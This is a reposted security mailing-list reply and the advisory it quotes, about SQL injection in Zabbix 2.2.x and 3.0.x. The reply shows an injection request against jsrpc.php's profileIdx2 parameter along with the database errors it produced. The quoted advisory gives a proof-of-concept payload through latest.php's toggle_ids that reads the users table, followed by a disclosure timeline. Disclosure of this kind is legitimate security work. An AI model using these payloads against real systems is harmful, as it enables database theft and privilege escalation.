I actually ended up finding this vuln in a different vector (in the profileIdx2 parameter). /zabbix/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get×tamp=1471054088083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=2’3297&updateProfile=true&screenitemid=&period=3600&stime=20170813040734&resourcetype=17&itemids%5B23297%5D=23297&action=showlatest&filter=&filter_task=&mark_color=1
| Timestamp |
Value |
| No data found. |
- Error in query [INSERT INTO profiles (profileid, userid, idx, value_int, type, idx2) VALUES (39, 1, 'web.item.graph.period', '3600', 2, 2'3297)] [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''3297)' at line 1]
- Error in query [INSERT INTO profiles (profileid, userid, idx, value_str, type, idx2) VALUES (40, 1, 'web.item.graph.stime', '20160813041028', 3, 2'3297)] [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''3297)' at line 1]
- Error in query [INSERT INTO profiles (profileid, userid, idx, value_int, type, idx2) VALUES (41, 1, 'web.item.graph.isnow', '1', 2, 2'3297)] [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''3297)' at line 1]
Similarly, it requires auth unless you enable Guest. > On Aug 11, 2016, at 7:23 PM, 1n3@hushmail.com wrote: > > ========================================= > Title: Zabbix 3.0.3 SQL Injection Vulnerability > Product: Zabbix > Vulnerable Version(s): 2.2.x, 3.0.x > Fixed Version: 3.0.4 > Homepage: http://www.zabbix.com > Patch link: http://ift.tt/2aSpydV > Credit: 1N3@CrowdShield > ========================================== > > > Vendor Description: > ===================== > Zabbix is an open source availability and performance monitoring solution. > > > Vulnerability Overview: > ===================== > Zabbix 2.2.x, 3.0.x and trunk suffers from a remote SQL injection vulnerability due to a failure to sanitize input in the toggle_ids array in the latest.php page. > > > Business Impact: > ===================== > By exploiting this SQL injection vulnerability, an authenticated attacker (or guest user) is able to gain full access to the database. This would allow an attacker to escalate their privileges to a power user, compromise the database, or execute commands on the underlying database operating system. > > Because of the functionalities Zabbix offers, an attacker with admin privileges (depending on the configuration) can execute arbitrary OS commands on the configured Zabbix hosts and server. This results in a severe impact to the monitored infrastructure. > > Although the attacker needs to be authenticated in general, the system could also be at risk if the adversary has no user account. Zabbix offers a guest mode which provides a low privileged default account for users without password. If this guest mode is enabled, the SQL injection vulnerability can be exploited unauthenticated. > > > Proof of Concept: > ===================== > > latest.php?output=ajax&sid=&favobj=toggle&toggle_open_state=1&toggle_ids[]=15385); select * from users where (1=1 > > Result: > SQL (0.000361): INSERT INTO profiles (profileid, userid, idx, value_int, type, idx2) VALUES (88, 1, 'web.latest.toggle', '1', 2, 15385); select * from users where (1=1) > latest.php:746 → require_once() → CProfile::flush() → CProfile::insertDB() → DBexecute() in /home/sasha/zabbix-svn/branches/2.2/frontends/php/include/profiles.inc.php:185 > > > Disclosure Timeline: > ===================== > > 7/18/2016 - Reported vulnerability to Zabbix > 7/21/2016 - Zabbix responded with permission to file CVE and to disclose after a patch is made public > 7/22/2016 - Zabbix released patch for vulnerability > 8/3/2016 - CVE details submitted > 8/11/2016 - Vulnerability details disclosed > > >
Source: Gmail -> IFTTT-> Blogger
No comments:
Post a Comment